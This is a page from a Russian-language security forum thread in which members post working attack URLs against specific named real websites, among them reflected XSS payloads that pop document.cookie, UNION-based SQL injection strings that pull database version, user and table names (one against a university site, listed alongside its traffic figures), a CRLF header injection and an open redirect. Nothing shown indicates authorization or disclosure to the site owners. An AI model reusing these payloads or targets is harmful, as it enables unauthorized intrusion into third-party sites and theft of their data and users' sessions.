HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #111  
Старый 01.07.2015, 00:32
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS:

Код:
Code:
http://inforico.com.ua/my/?mq=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&st=A
 
Ответить с цитированием

  #112  
Старый 03.07.2015, 12:10
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS:

Код:
Code:
http://don.ua/news/index.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
 
Ответить с цитированием

  #113  
Старый 04.07.2015, 11:08
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS:

Код:
Code:
http://agronews.ru/forums/index.php?ACTION=FORUM_SUBSCRIBE&FID=14%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.cookie%29%3C/ScRiPt%3E&PAGE_NAME=list&sessid=69fa9ea1c1f8fa858cb91f13ece82f69
 
Ответить с цитированием

  #114  
Старый 04.07.2015, 21:51
semen6192
Guest
Сообщений: n/a
Провел на форуме:
6419

Репутация: 2
По умолчанию

XSS:

Код:
Code:
http://cvp.cce.cornell.edu/search_results.php?q=%3Cscript%3Ealert%28%27anticat.ru%27%29%3C%2Fscript%3E&x=9&y=9
 
Ответить с цитированием

  #115  
Старый 05.07.2015, 15:02
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Ребят, в целях обучения начинающих пентестеров грамотным определениям - ЖЕЛАТЕЛЬНО (если хотите плюсы) указывать полный тип найденной уязвимости - Blind SQL Injection, Reflected XSS, Arbitrary File Downloading и другие.

Спасибо за внимание.

З.Ы. Модерам - прошу закрепить в начале топика.
 
Ответить с цитированием

  #116  
Старый 05.07.2015, 15:38
EoGeneo
Познающий
Регистрация: 29.08.2009
Сообщений: 75
Провел на форуме:
315861

Репутация: 5
Отправить сообщение для EoGeneo с помощью ICQ
По умолчанию

Попробую проканать за пионера

SQL-inj:

Код:
Code:
http://www.organicindia.com/article.php?articleid=57+/*!50000union*/+distinct+select+1,2,version(),4,database()--+-


[COLOR="rgb(0, 179, 0)"]Вывод в конце правой колонки.
[/COLOR]

----

Код:
Code:
http://www.ipicgroup.com/shopping_centre.php?id=-1+/*!50000union*/+distinct+select+1,database(),3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17--+-
 
Ответить с цитированием

  #117  
Старый 06.07.2015, 00:20
nikonic
Guest
Сообщений: n/a
Провел на форуме:
8455

Репутация: 7
По умолчанию

Брауновский университет — один из наиболее престижных частных университетов США, расположенный в городе Провиденсе, штата Род-Айленд.Седьмой из старейших национальных университетов и один из девяти колониальных колледжей.​
SQL Injection

Код:
Code:
http://www.brown.edu/Administration/Auxiliary_Housing/php/show.php?TypeID=999999.9+union+all+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)
5.0.95-log

PR- 8

ТИц - 800

Alexa:9к

Трафф - 2.6кк в месяц.
 
Ответить с цитированием

  #118  
Старый 06.07.2015, 16:04
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

CRLF-inj (Результат отображается в heade'ре).

Код:
Code:
http://www.notomania.ru/cat_view.php?id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
 
Ответить с цитированием

  #119  
Старый 06.07.2015, 20:32
semen6192
Guest
Сообщений: n/a
Провел на форуме:
6419

Репутация: 2
По умолчанию

XSS:

Код:
Code:
http://friendship-bracelets.net/search.php?search_text=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E
 
Ответить с цитированием

  #120  
Старый 07.07.2015, 00:39
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:clanwilliam.info

type: SQL Injection

current user: `clanwi_1@%`

version: 5.5.43-0+DEB7U1-LOG

Код:
Code:
http://www.clanwilliam.info/index.php?id=-1+union+select+1,version(),3,table_name,5,6,7+from+information_schema.tables+limit+0,1+--+;




target:
sergiev.ru

type:Open Redirect

Код:
Code:
http://www.sergiev.ru/?q=http://ya.ru

 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ